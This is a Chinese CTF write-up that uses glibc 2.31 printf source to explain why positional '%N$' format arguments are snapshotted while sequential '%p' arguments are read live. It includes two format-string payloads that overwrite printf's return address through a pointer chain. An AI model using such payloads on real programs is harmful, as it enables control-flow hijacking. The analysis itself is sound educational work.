0x00

在第六届强网拟态线下赛的一道格式化字符串漏洞题目中,遇到了一个情况没有想通,找了个时间分析了一下 printf的源码(glibc2.31),分析清楚原因了

0x01 issue

奇怪合理的现象

1
2
3
payload = '%{}c'.format(printf_ret).encode() + b"%11$hn" + \
'%{}c'.format(0x10000 - printf_ret + 0x23).encode() + b"%39$hhn"
io.send(payload)

最初我是这样写的,调试发现仅仅成功修改了跳板,而目标,也就是printf的返回地址却没有修改到

1
2
3
payload = b'%p'*9 + '%{}c'.format(printf_ret - 90).encode() + b"%hn" + \
'%{}c'.format(0x10000 - printf_ret + 0x23).encode() + b"%39$hhn"
io.send(payload)

而换个偏移方式,这样却能同时修改成功

0x02 why?

探究一下多个 % 偏移参数和 $ 偏移参数在格式化字符串中的差异

我们找到源码中处理格式化字符串的部分(glibc2.31)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
/* Process whole format string.  */
do
{
STEP0_3_TABLE;
STEP4_TABLE;

union printf_arg *args_value; /* This is not used here but ... */
int is_negative; /* Flag for negative number. */
union
{
unsigned long long int longlong;
unsigned long int word;
} number;
int base;
union printf_arg the_arg;
CHAR_T *string; /* Pointer to argument string. */
int alt = 0; /* Alternate format. */
int space = 0; /* Use space prefix if no sign is needed. */
int left = 0; /* Left-justify output. */
int showsign = 0; /* Always begin with plus or minus sign. */
int group = 0; /* Print numbers according grouping rules. */
int is_long_double = 0; /* Argument is long double/ long long int. */
int is_short = 0; /* Argument is short int. */
int is_long = 0; /* Argument is long int. */
int is_char = 0; /* Argument is promoted (unsigned) char. */
int width = 0; /* Width of output; 0 means none specified. */
int prec = -1; /* Precision of output; -1 means none specified. */
/* This flag is set by the 'I' modifier and selects the use of the
`outdigits' as determined by the current locale. */
int use_outdigits = 0;
UCHAR_T pad = L_(' ');/* Padding character. */
CHAR_T spec;

workstart = NULL;
workend = work_buffer + WORK_BUFFER_SIZE;

/* Get current character in format string. */
JUMP (*++f, step0_jumps);

/* ' ' flag. */
LABEL (flag_space):
space = 1;
JUMP (*++f, step0_jumps);

/* '+' flag. */
LABEL (flag_plus):
showsign = 1;
JUMP (*++f, step0_jumps);

/* The '-' flag. */
LABEL (flag_minus):
left = 1;
pad = L_(' ');
JUMP (*++f, step0_jumps);

/* The '#' flag. */
LABEL (flag_hash):
alt = 1;
JUMP (*++f, step0_jumps);

/* The '0' flag. */
LABEL (flag_zero):
if (!left)
pad = L_('0');
JUMP (*++f, step0_jumps);

/* The '\'' flag. */
LABEL (flag_quote):
group = 1;

if (grouping == (const char *) -1)
{
#ifdef COMPILE_WPRINTF
thousands_sep = _NL_CURRENT_WORD (LC_NUMERIC,
_NL_NUMERIC_THOUSANDS_SEP_WC);
#else
thousands_sep = _NL_CURRENT (LC_NUMERIC, THOUSANDS_SEP);
#endif

grouping = _NL_CURRENT (LC_NUMERIC, GROUPING);
if (*grouping == '\0' || *grouping == CHAR_MAX
#ifdef COMPILE_WPRINTF
|| thousands_sep == L'\0'
#else
|| *thousands_sep == '\0'
#endif
)
grouping = NULL;
}
JUMP (*++f, step0_jumps);

LABEL (flag_i18n):
use_outdigits = 1;
JUMP (*++f, step0_jumps);

/* Get width from argument. */
LABEL (width_asterics):
{
const UCHAR_T *tmp; /* Temporary value. */

tmp = ++f;
if (ISDIGIT (*tmp))
{
int pos = read_int (&tmp);

if (pos == -1)
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}

if (pos && *tmp == L_('$'))
/* The width comes from a positional parameter. */
goto do_positional;
}
width = va_arg (ap, int);

/* Negative width means left justified. */
if (width < 0)
{
width = -width;
pad = L_(' ');
left = 1;
}

if (__glibc_unlikely (width >= INT_MAX / sizeof (CHAR_T) - EXTSIZ))
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}

if (width >= WORK_BUFFER_SIZE - EXTSIZ)
{
/* We have to use a special buffer. */
size_t needed = ((size_t) width + EXTSIZ) * sizeof (CHAR_T);
if (__libc_use_alloca (needed))
workend = (CHAR_T *) alloca (needed) + width + EXTSIZ;
else
{
workstart = (CHAR_T *) malloc (needed);
if (workstart == NULL)
{
done = -1;
goto all_done;
}
workend = workstart + width + EXTSIZ;
}
}
}
JUMP (*f, step1_jumps);

/* Given width in format string. */
LABEL (width):
width = read_int (&f);

if (__glibc_unlikely (width == -1
|| width >= INT_MAX / sizeof (CHAR_T) - EXTSIZ))
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}

if (width >= WORK_BUFFER_SIZE - EXTSIZ)
{
/* We have to use a special buffer. */
size_t needed = ((size_t) width + EXTSIZ) * sizeof (CHAR_T);
if (__libc_use_alloca (needed))
workend = (CHAR_T *) alloca (needed) + width + EXTSIZ;
else
{
workstart = (CHAR_T *) malloc (needed);
if (workstart == NULL)
{
done = -1;
goto all_done;
}
workend = workstart + width + EXTSIZ;
}
}
if (*f == L_('$'))
/* Oh, oh. The argument comes from a positional parameter. */
goto do_positional;
JUMP (*f, step1_jumps);

LABEL (precision):
++f;
if (*f == L_('*'))
{
const UCHAR_T *tmp; /* Temporary value. */

tmp = ++f;
if (ISDIGIT (*tmp))
{
int pos = read_int (&tmp);

if (pos == -1)
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}

if (pos && *tmp == L_('$'))
/* The precision comes from a positional parameter. */
goto do_positional;
}
prec = va_arg (ap, int);

/* If the precision is negative the precision is omitted. */
if (prec < 0)
prec = -1;
}
else if (ISDIGIT (*f))
{
prec = read_int (&f);

/* The precision was specified in this case as an extremely
large positive value. */
if (prec == -1)
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}
}
else
prec = 0;
if (prec > width && prec > WORK_BUFFER_SIZE - EXTSIZ)
{
/* Deallocate any previously allocated buffer because it is
too small. */
if (__glibc_unlikely (workstart != NULL))
free (workstart);
workstart = NULL;
if (__glibc_unlikely (prec >= INT_MAX / sizeof (CHAR_T) - EXTSIZ))
{
__set_errno (EOVERFLOW);
done = -1;
goto all_done;
}
size_t needed = ((size_t) prec + EXTSIZ) * sizeof (CHAR_T);

if (__libc_use_alloca (needed))
workend = (CHAR_T *) alloca (needed) + prec + EXTSIZ;
else
{
workstart = (CHAR_T *) malloc (needed);
if (workstart == NULL)
{
done = -1;
goto all_done;
}
workend = workstart + prec + EXTSIZ;
}
}
JUMP (*f, step2_jumps);

/* Process 'h' modifier. There might another 'h' following. */
LABEL (mod_half):
is_short = 1;
JUMP (*++f, step3a_jumps);

/* Process 'hh' modifier. */
LABEL (mod_halfhalf):
is_short = 0;
is_char = 1;
JUMP (*++f, step4_jumps);

/* Process 'l' modifier. There might another 'l' following. */
LABEL (mod_long):
is_long = 1;
JUMP (*++f, step3b_jumps);

/* Process 'L', 'q', or 'll' modifier. No other modifier is
allowed to follow. */
LABEL (mod_longlong):
is_long_double = 1;
is_long = 1;
JUMP (*++f, step4_jumps);

LABEL (mod_size_t):
is_long_double = sizeof (size_t) > sizeof (unsigned long int);
is_long = sizeof (size_t) > sizeof (unsigned int);
JUMP (*++f, step4_jumps);

LABEL (mod_ptrdiff_t):
is_long_double = sizeof (ptrdiff_t) > sizeof (unsigned long int);
is_long = sizeof (ptrdiff_t) > sizeof (unsigned int);
JUMP (*++f, step4_jumps);

LABEL (mod_intmax_t):
is_long_double = sizeof (intmax_t) > sizeof (unsigned long int);
is_long = sizeof (intmax_t) > sizeof (unsigned int);
JUMP (*++f, step4_jumps);

/* Process current format. */
while (1)
{
process_arg (((struct printf_spec *) NULL));
process_string_arg (((struct printf_spec *) NULL));

LABEL (form_unknown):
if (spec == L_('\0'))
{
/* The format string ended before the specifier is complete. */
__set_errno (EINVAL);
done = -1;
goto all_done;
}

/* If we are in the fast loop force entering the complicated
one. */
goto do_positional;
}

/* The format is correctly handled. */
++nspecs_done;

if (__glibc_unlikely (workstart != NULL))
free (workstart);
workstart = NULL;

/* Look for next format specifier. */
#ifdef COMPILE_WPRINTF
f = __find_specwc ((end_of_spec = ++f));
#else
f = __find_specmb ((end_of_spec = ++f));
#endif

/* Write the following constant string. */
outstring (end_of_spec, f - end_of_spec);
}
while (*f != L_('\0'));

其中涉及到的几个跳转表结构都在宏STEP0_3_TABLE以及STEP4_TABLE里,定义如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#define STEP0_3_TABLE							      \
/* Step 0: at the beginning. */ \
static JUMP_TABLE_TYPE step0_jumps[30] = \
{ \
REF (form_unknown), \
REF (flag_space), /* for ' ' */ \
REF (flag_plus), /* for '+' */ \
REF (flag_minus), /* for '-' */ \
REF (flag_hash), /* for '<hash>' */ \
REF (flag_zero), /* for '0' */ \
REF (flag_quote), /* for '\'' */ \
REF (width_asterics), /* for '*' */ \
REF (width), /* for '1'...'9' */ \
REF (precision), /* for '.' */ \
REF (mod_half), /* for 'h' */ \
REF (mod_long), /* for 'l' */ \
REF (mod_longlong), /* for 'L', 'q' */ \
REF (mod_size_t), /* for 'z', 'Z' */ \
REF (form_percent), /* for '%' */ \
REF (form_integer), /* for 'd', 'i' */ \
REF (form_unsigned), /* for 'u' */ \
REF (form_octal), /* for 'o' */ \
REF (form_hexa), /* for 'X', 'x' */ \
REF (form_float), /* for 'E', 'e', 'F', 'f', 'G', 'g' */ \
REF (form_character), /* for 'c' */ \
REF (form_string), /* for 's', 'S' */ \
REF (form_pointer), /* for 'p' */ \
REF (form_number), /* for 'n' */ \
REF (form_strerror), /* for 'm' */ \
REF (form_wcharacter), /* for 'C' */ \
REF (form_floathex), /* for 'A', 'a' */ \
REF (mod_ptrdiff_t), /* for 't' */ \
REF (mod_intmax_t), /* for 'j' */ \
REF (flag_i18n), /* for 'I' */ \
};
/* Step 1: after processing width. */ \
static JUMP_TABLE_TYPE step1_jumps[30] =
{
...
}
/* Step 2: after processing precision. */ \
static JUMP_TABLE_TYPE step2_jumps[30] =
{
...
}
/* Step 3a: after processing first 'h' modifier. */ \
static JUMP_TABLE_TYPE step3a_jumps[30] =
{
...
}
/* Step 3b: after processing first 'l' modifier. */ \
static JUMP_TABLE_TYPE step3b_jumps[30] =
{
...
}

#define STEP4_TABLE \
/* Step 4: processing format specifier. */ \
static JUMP_TABLE_TYPE step4_jumps[30] = \
{ \
REF (form_unknown), \
REF (form_unknown), /* for ' ' */ \
REF (form_unknown), /* for '+' */ \
REF (form_unknown), /* for '-' */ \
REF (form_unknown), /* for '<hash>' */ \
REF (form_unknown), /* for '0' */ \
REF (form_unknown), /* for '\'' */ \
REF (form_unknown), /* for '*' */ \
REF (form_unknown), /* for '1'...'9' */ \
REF (form_unknown), /* for '.' */ \
REF (form_unknown), /* for 'h' */ \
REF (form_unknown), /* for 'l' */ \
REF (form_unknown), /* for 'L', 'q' */ \
REF (form_unknown), /* for 'z', 'Z' */ \
REF (form_percent), /* for '%' */ \
REF (form_integer), /* for 'd', 'i' */ \
REF (form_unsigned), /* for 'u' */ \
REF (form_octal), /* for 'o' */ \
REF (form_hexa), /* for 'X', 'x' */ \
REF (form_float), /* for 'E', 'e', 'F', 'f', 'G', 'g' */ \
REF (form_character), /* for 'c' */ \
REF (form_string), /* for 's', 'S' */ \
REF (form_pointer), /* for 'p' */ \
REF (form_number), /* for 'n' */ \
REF (form_strerror), /* for 'm' */ \
REF (form_wcharacter), /* for 'C' */ \
REF (form_floathex), /* for 'A', 'a' */ \
REF (form_unknown), /* for 't' */ \
REF (form_unknown), /* for 'j' */ \
REF (form_unknown) /* for 'I' */ \
}

省略部分基本都长一个样,就是按照顺序,先处理宽度精度等等,在根据特定参数进行操作
来分析一下处理流程,以%n为例,在宏process_arg(fspec)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
LABEL (form_number):						      \
if ((mode_flags & PRINTF_FORTIFY) != 0) \
{ \
if (! readonly_format) \
{ \
extern int __readonly_area (const void *, size_t) \
attribute_hidden; \
readonly_format \
= __readonly_area (format, ((STR_LEN (format) + 1) \
* sizeof (CHAR_T))); \
} \
if (readonly_format < 0) \
__libc_fatal ("*** %n in writable segment detected ***\n"); \
} \
/* Answer the count of characters written. */ \
if (fspec == NULL) \
{ \
if (is_longlong) \
*(long long int *) va_arg (ap, void *) = done; \
else if (is_long_num) \
*(long int *) va_arg (ap, void *) = done; \
else if (is_char) \
*(char *) va_arg (ap, void *) = done; \
else if (!is_short) \
*(int *) va_arg (ap, void *) = done; \
else \
*(short int *) va_arg (ap, void *) = done; \
} \
else \
if (is_longlong) \
*(long long int *) args_value[fspec->data_arg].pa_pointer = done; \
else if (is_long_num) \
*(long int *) args_value[fspec->data_arg].pa_pointer = done; \
else if (is_char) \
*(char *) args_value[fspec->data_arg].pa_pointer = done; \
else if (!is_short) \
*(int *) args_value[fspec->data_arg].pa_pointer = done; \
else \
*(short int *) args_value[fspec->data_arg].pa_pointer = done; \
break;

看到这里判断 fspec 的状态,为NULL则直接从va_arg(ap, type)来逐个顺序取参,也就是线性的先取寄存器再取栈上参数,并且实时修改完成(**printf 函数利用格式化字符串减去的应该是后五个寄存器,rdi 本身是一个字符串地址,% 占位符解析的是从 rsi 开始的,五个寄存器再加栈内存单元**)
如果不为 NULL 则从args_value[index]取参数,这里的index索引是提前确定的。哪里确定呢?当使用 $ 来确定参数时候,会进入一个特殊的处理函数

1
2
3
if (*f == L_('$'))
/* Oh, oh. The argument comes from a positional parameter. */
goto do_positional;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
do_positional:
if (__glibc_unlikely (workstart != NULL))
{
free (workstart);
workstart = NULL;
}
done = printf_positional (s, format, readonly_format, ap, &ap_save,
done, nspecs_done, lead_str_end, work_buffer,
save_errno, grouping, thousands_sep, mode_flags);

all_done:
if (__glibc_unlikely (workstart != NULL))
free (workstart);
/* Unlock the stream. */
_IO_funlockfile (s);
_IO_cleanup_region_end (0);

return done;
}

会调用 printf_positional 函数,这个函数长的要命,不全贴,展示一下关键流程。
先是对参数存储区域的初始化,不赘述;然后依次将参数从va_arg放入 args_value[]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
/* Fill in the types of all the arguments.  */
for (cnt = 0; cnt < nspecs; ++cnt)
{
/* If the width is determined by an argument this is an int. */
if (specs[cnt].width_arg != -1)
args_type[specs[cnt].width_arg] = PA_INT;

/* If the precision is determined by an argument this is an int. */
if (specs[cnt].prec_arg != -1)
args_type[specs[cnt].prec_arg] = PA_INT;

switch (specs[cnt].ndata_args)
{
case 0: /* No arguments. */
break;
case 1: /* One argument; we already have the
type and size. */
args_type[specs[cnt].data_arg] = specs[cnt].data_arg_type;
args_size[specs[cnt].data_arg] = specs[cnt].size;
break;
default:
/* We have more than one argument for this format spec.
We must call the arginfo function again to determine
all the types. */
(void) (*__printf_arginfo_table[specs[cnt].info.spec])
(&specs[cnt].info,
specs[cnt].ndata_args, &args_type[specs[cnt].data_arg],
&args_size[specs[cnt].data_arg]);
break;
}
}

/* Now we know all the types and the order. Fill in the argument
values. */
for (cnt = 0; cnt < nargs; ++cnt)
switch (args_type[cnt])
{
#define T(tag, mem, type) \
case tag: \
args_value[cnt].mem = va_arg (*ap_savep, type); \
break

T (PA_WCHAR, pa_wchar, wint_t);
case PA_CHAR: /* Promoted. */
case PA_INT|PA_FLAG_SHORT: /* Promoted. */
#if LONG_MAX == INT_MAX
case PA_INT|PA_FLAG_LONG:
#endif
T (PA_INT, pa_int, int);
#if LONG_MAX == LONG_LONG_MAX
case PA_INT|PA_FLAG_LONG:
#endif
T (PA_INT|PA_FLAG_LONG_LONG, pa_long_long_int, long long int);
#if LONG_MAX != INT_MAX && LONG_MAX != LONG_LONG_MAX
# error "he?"
#endif
case PA_FLOAT: /* Promoted. */
T (PA_DOUBLE, pa_double, double);
case PA_DOUBLE|PA_FLAG_LONG_DOUBLE:
if (__glibc_unlikely ((mode_flags & PRINTF_LDBL_IS_DBL) != 0))
{
args_value[cnt].pa_double = va_arg (*ap_savep, double);
args_type[cnt] &= ~PA_FLAG_LONG_DOUBLE;
}
#if __HAVE_FLOAT128_UNLIKE_LDBL
else if ((mode_flags & PRINTF_LDBL_USES_FLOAT128) != 0)
args_value[cnt].pa_float128 = va_arg (*ap_savep, _Float128);
#endif
else
args_value[cnt].pa_long_double = va_arg (*ap_savep, long double);
break;
case PA_STRING: /* All pointers are the same */
case PA_WSTRING: /* All pointers are the same */
T (PA_POINTER, pa_pointer, void *);
#undef T
default:
if ((args_type[cnt] & PA_FLAG_PTR) != 0)
args_value[cnt].pa_pointer = va_arg (*ap_savep, void *);
else if (__glibc_unlikely (__printf_va_arg_table != NULL)
&& __printf_va_arg_table[args_type[cnt] - PA_LAST] != NULL)
{
args_value[cnt].pa_user = alloca (args_size[cnt]);
(*__printf_va_arg_table[args_type[cnt] - PA_LAST])
(args_value[cnt].pa_user, ap_savep);
}
else
memset (&args_value[cnt], 0, sizeof (args_value[cnt]));
break;
case -1:
/* Error case. Not all parameters appear in N$ format
strings. We have no way to determine their type. */
assert ((mode_flags & PRINTF_FORTIFY) != 0);
__libc_fatal ("*** invalid %N$ use detected ***\n");
}

这相当于建立了一个“参数快照”,也就是保留了此时的全部参数情况,然后重新处理整个fmtstr

1
2
3
4
5
6
7
8
9
/* Now walk through all format specifiers and process them.  */
for (; (size_t) nspecs_done < nspecs; ++nspecs_done)
{
STEP4_TABLE;
...
process_arg ((&specs[nspecs_done]));
process_string_arg ((&specs[nspecs_done]));
...
}

这里也是使用了一样的处理的宏,见此前处理流程

1
2
3
4
5
6
7
do
{
...
process_arg (((struct printf_spec *) NULL));
process_string_arg (((struct printf_spec *) NULL));
...
} while();

但是printf_positional函数传入的 fspec 不再是NULL,而是(&specs[nspecs_done]),此时就会根据 args_value[]来取参数,并且这时候即使对参数做了更改,也不会影响到建立的“参数快照”,这也就解释了

1
2
3
payload = b'%p'*9 + '%{}c'.format(printf_ret - 90).encode() + b"%hn" + \
'%{}c'.format(0x10000 - printf_ret + 0x23).encode() + b"%39$hhn"
io.send(payload)

这样可以一次性改成,而

1
2
3
payload = '%{}c'.format(printf_ret).encode() + b"%11$hn" + \
'%{}c'.format(0x10000 - printf_ret + 0x23).encode() + b"%39$hhn"
io.send(payload)

这样却不行的情况了